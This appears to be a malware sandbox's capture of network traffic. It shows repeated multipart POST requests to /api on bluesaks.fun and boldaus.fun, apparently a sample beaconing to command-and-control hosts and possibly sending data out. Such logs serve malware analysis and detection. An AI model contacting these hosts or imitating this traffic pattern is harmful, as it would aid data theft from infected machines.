                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=tshtqmbb98c67s2llnrao74v0d; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b00EsbfZknCLPxgrrtZmlxKjkz7qD93jaq6mrOIXKKPDkIaczaDULctDJQtur1bSpSeDXZ%2FJVzhua%2BVKzkGLH7QWUrTDiSpInUiozeJUqvkLAJTSGIuKPZyfWsBzpSI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b0a8f065fd-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=bi0tk7c00bqbqshmihrlq5v13u; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Uaq4IoO%2B5RM%2F4uelh9KHrJS5eLXDlP22nsk47s0DHXRYnkZENhC9JiZHtktlU8xHXWRZO5J5NufscKK3kWtrPymHjuhlQxtMEWXjstmd04c%2BFATna6dOGvF1aO0Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b0acc366da-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=qfm12sc1gsuu577gehu858ts3t; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYwxutXNt9vlJZFdXHGMunvilQ%2BzX3dGfaFumj7kvtb%2Fz02pizktYbFIWuCsWl431YZbC%2BtDmXEvfDYQJiJDuW46Bc61Fx48Fn7rTKD9ue8ABmM5ur5eMH9cU8xZGks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b24f6d1c8e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=9p2se93dqm8se0htg59330dhgo; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B5C8t%2FT6PvBaT%2Bfqs%2FpSJmCV63HmFcLFsf2j2wTPNhWNKL68RumSL2ETLqwigTQL%2BGSRJunv5qSjEPWaitWtgV%2B4Ws4DlZdD6R7Ax37pFL7xr26rNxX0f9HGrw8tGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b25c83b8a3-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=ofa6m3b4mbi92eov30m22djjbs; expires=Sat, 17 Feb 2024 06:35:12 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:33 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nFJ85wptBrQgPuTyYaVzMg1WE6%2FLH%2Fpg1Ga7q93%2FvsSqVzk8LobEGD31GyrOUdixfcaa1tAoxLwKmmtxzeKAbcyrTHk884W%2FXPZhH%2BK018K0Py%2FOD32rSvIccuj8XeU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b3aa345c48-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=9o9e3dsslvujam22vrv3rgbo5j; expires=Sat, 17 Feb 2024 06:35:13 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:34 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rC12CAo15X4n9JIG8tU5Ya5uueahueubAteh8YexRYqkzOFCb%2BEFIJPAFgBZyjce76xNRBJ8%2BRC3AnvXBdbGLbkmfyEsDkmTs38piak9sTcTWgfVKr7XxJjIy1iGUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b44f97b8fd-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=h0sb5u76u91m95ui0cg5ak4m5f; expires=Sat, 17 Feb 2024 06:35:13 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:34 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eZoZcNnBAZmyWtkcAo2%2FXJDtV3rS48sv6zRzga38OZldT8mg35V0MzjMNFF%2BcSsK%2BnVDVP5XLotp418C8Thmr3ZIHWBUlX%2F6g3NGRAnmuFDDgh7C9lFSJP5oCSh9ykM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b4fcf20b04-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=m55ppjfvk023r8oqm3464javt4; expires=Sat, 17 Feb 2024 06:35:13 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:34 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgctTQT9drhl5tEibqHz3lOxT0rkAnin4rwAz2hya2OT6ofpmhdujiAqIu%2F5P3WKBYQ8yfQ9dzLPeXYQhpnGzLwulLTTOTe%2FqRXUnVpdaefsA5XV79MW6werLKJzpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b59bfe6570-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 17437
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=ikajog00f3bsfr74hp9g8qarft; expires=Sat, 17 Feb 2024 06:35:13 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:34 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UDdOSw8Z1OrZI6RjJdvw1jRnXwLy%2B4cL05dNY0o7PwHCyZqg26%2FySoghwySuP3InnDPsquWbYgS%2FjG5pGQfnx44VJb70OGpoDfJxyT%2BiUvlCDdzVjDTuWvMAuPboUY8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b70ce56574-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 17444
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:34 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=4tdk7b757rkt5jbbb2i1uk6r61; expires=Sat, 17 Feb 2024 06:35:13 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:34 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VQEraTEXnGSYet2e56J0n9LIobMjUxI3Yrp%2BbAuLBcx8ZLYK8JEKTuN%2B7ebRTxwJzOfvbQaE238W%2BHoF5i7H04xksc6sog41I23FIjm%2B3fiFbKkmz%2BYvSLVa0qHQ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255b7983f6709-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=esf75mtjtibig0bst4o7n1li4b; expires=Sat, 17 Feb 2024 06:35:15 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:36 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4x9W4oe%2B0dKOm1ur0TeNGhOlM2UT9HdPvusSQEhvzugYgE0iatq%2BK4sQ93q%2Bg%2BCVeLPD5GOebKodUV7HWTPxXKvKnJOID%2FtSErNmQZB14sJVffwBt63%2FMTSHEu692Tw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255c31acf0e00-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=s57gj7b3hk0khl9q55r08b3akb; expires=Sat, 17 Feb 2024 06:35:15 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:36 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wJ4sD0dc%2FBrGWyVxBZ3twhhctF0h52W%2BoEPmFIOAiMdpTf%2BJcOHQC49rn1KFLyuBkYE0R4cpCn2mGedQXeC%2F9aYCbblIcvTDq1cbskiiTVznjNIJOqedyenBMBGrYkQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255c46a6b0b33-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=f0flv2mefvklikfstf3d0ip6c2; expires=Sat, 17 Feb 2024 06:35:15 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:36 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
